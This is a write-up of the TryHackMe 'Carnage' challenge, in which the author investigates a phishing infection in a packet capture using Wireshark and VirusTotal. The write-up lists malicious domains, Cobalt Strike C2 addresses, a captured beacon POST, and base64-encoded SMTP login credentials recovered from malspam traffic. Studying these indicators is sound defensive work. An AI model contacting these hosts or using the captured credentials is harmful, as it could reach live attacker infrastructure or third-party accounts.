Post

TryHackMe -Carnage

Posted Updated
By Bonface Maina
6 min read

The challenge starts off by explaining to us how a user in an organization is tricked to opening a document from a phishing email and enables content. But the SOC team are immediately alerted of the workstation making suspicious connections outbound.
A pcap is capture and our task is to : Investigate the packet capture and uncover the malicious activities.

We shall use the questions to guide us through.

1. What was the date and time for the first HTTP connection to the malicious IP?
To answer this we start by filtering the http packets and the packet that comes first will be the first request sent.
The issue is the time and date format and to fix it we use the View tab and go to Time and Display Format

1
2

yyyy-mm-dd hh:mm:ss
2021-09-24 16:44:38

2.What is the name of the zip file that was downloaded?
Following the http request we get the client was requesting for a document using a Get request.
The file is : documents.zip

3.What was the domain hosting the malicious zip file?
Still on the http request we see the host the client is communicating to .
The domain is : attirenepal.com

4.Without downloading the file, what is the name of the file in the zip file?
Since we are instructed to retrieve the file name without downloading the zip, will do try zipping a file and see how i can retrieve the file name and with that knowledge we can get back to the rest.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

# create a demo file
touch file.php

# zip the file
zip hello file.php
  adding: file.php (stored 0%)

# We get this
ls
file.php  hello.zip

# try retreiving the file name
strings hello.zip 
file.phpUT	
Khux
file.phpUT
Khux

From the demo we see we can retrieve the file name from the first line of strings in the zip file.
The file name is : chart-1530076591.xls

5.What is the name of the webserver of the malicious IP from which the zip file was downloaded?
We can easily read this from http response from the server

1

Server : LiteSpeed

6.What is the version of the webserver from the previous question?
Similar to the previous challenge we can get the version from the http headers of the servers response.

1

x-powered-by : PHP/7.2.34

7. Malicious files were downloaded to the victim host from multiple domains. What were the three domains involved with this activity?
Hint : Check HTTPS traffic. Narrow down the timeframe from 16:45:11 to 16:45:30.

Filtering within a time range:
You can combine frame.time with comparison operators >=, <=, <, >, == to filter for packets within a specific time interval.
For instance :
frame.time >= "Feb 2, 2024 08:40:00" && frame.time <= "Feb 2, 2024 08:42:42"
will filter packets between those two times.

We craft our own from the hints timeline.

1

frame.time >= "2021-09-24 16:45:11" && frame.time<= "2021-09-24 16:45:30"

With this time frame we get a couple of packets, we shall ignore those from the same network.
Here are the domains we get and their ip addresses :

1
2
3
4
5
6

finejewels.com.au : 148.72.192.206
thietbiagt.com : 210.245.90.247
new.americold.com : 148.72.53.144

finejewel.com.au,thietbiagt.com,new.americold.com

8. Which certificate authority issued the SSL certificate to the first domain from the previous question?
When following the http stream of the finjewels.com.ay we see it reaching out to a repository http://certs.godaddy.com/repository/1301..U... which is Go Daddy Secure Certificate Authority.
The certificate authority will be godaddy

9. What are the two IP addresses of the Cobalt Strike servers? Use VirusTotal (the Community tab) to confirm if IPs are identified as Cobalt Strike C2 servers. (answer format: enter the IP addresses in sequential order)
For this we can filter all the ip addresses by going to the Statistics tab and selecting conversations .
Will admit at this point i was completely stuck, untill i started checking the community tab on [virus total]185.106.96.158 And this are the ips i got.

1
2
3

185.106.96.158
185.125.204.174

10. What is the Host header for the first Cobalt Strike IP address from the previous question?
Still on the community tab we get the answer to this question : ocsp.verisign.com

11. What is the domain name for the first IP address of the Cobalt Strike server? You may use VirusTotal to confirm if it’s the Cobalt Strike server (check the Community tab).

Also from the virus totalcommunity tab we get the domain name .

12. What is the domain name of the second Cobalt Strike server IP?  You may use VirusTotal to confirm if it’s the Cobalt Strike server (check the Community tab).

Similar to the previous one we get the domain name from the virus total community

13. What is the domain name of the post-infection traffic?

We use the wireshark filter : http.request.method == POST an follow the http requests from the ip : 10.9.23.102 to 208.91.128.6

14. What are the first eleven characters that the victim host sends out to the malicious domain involved in the post-infection traffic?

We go on to the first post request and follow the http traffic to get :

1
2
3
4
5
6

POST /zLIisQRWZI9/OQsaDixzHTgtfjMcGypGenpldWF5eWV9f3k= HTTP/1.1
Host: maldivehost.net
Content-Length: 112

Dw8YBxsEGmYFAAEJfR4NQkMmLTYqZDk5KyQmOyRGQglxEBo4Lzk/EyYrMi1hOT8vIyM7IhcNPzsOKjguFxgkLSIiJCxFRgwFAgIIDQUZGBoFD0JF

the first 11 characters are straight forward.

15. What was the length for the first packet sent out to the C2 server?
We go back to wireshark and get the length of the packet we were following.

16. What was the Server header for the malicious domain from the previous question?
For this we check the headers of the response from the server.

1
2
3
4
5
6
7
8

HTTP/1.1 200 OK
Date: Fri, 24 Sep 2021 16:46:15 GMT
Server: Apache/2.4.49 (cPanel) OpenSSL/1.1.1l mod_bwlimited/1.4
X-Powered-By: PHP/5.6.40
Content-Length: 302
Strict-Transport-Security: ...max-age=15552000...
Connection: close
Content-Type: text/html; charset=UTF-8

17. The malware used an API to check for the IP address of the victim’s machine. What was the date and time when the DNS query for the IP check domain occurred? (answer format: yyyy-mm-dd hh:mm:ss UTC)
For this we are looking for an api in dns query lets try creating a filter for that or just use the search option.

1
2

2021-09-24 17:00:04

18. What was the domain in the DNS query from the previous question?
This is straight forward from the previous challenge.

19. Looks like there was some malicious spam (malspam) activity going on. What was the first MAIL FROM address observed in the traffic?
Following the tcp stream of the smtp protocal we get :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

220 mail.mailfa.com

EHLO localhost

250-mail.mailfa.com
250-SIZE 30000000
250 AUTH LOGIN

AUTH LOGIN

334 VXNlcm5hbWU6

ZmFyc2hpbkBtYWlsZmEuY29t

334 UGFzc3dvcmQ6

ZGluYW1pdA==

235 authenticated.

MAIL FROM:<farshin@mailfa.com>

550 Your SMTP Service is disable please check by your mailservice provider.

we get the user who sent the email.

20. How many packets were observed for the SMTP traffic?
This was a nice bonus for we just needed to filter smtp and get the number of packets.

TryHackMe
TryHackMe
This post is licensed under CC BY 4.0 by the author.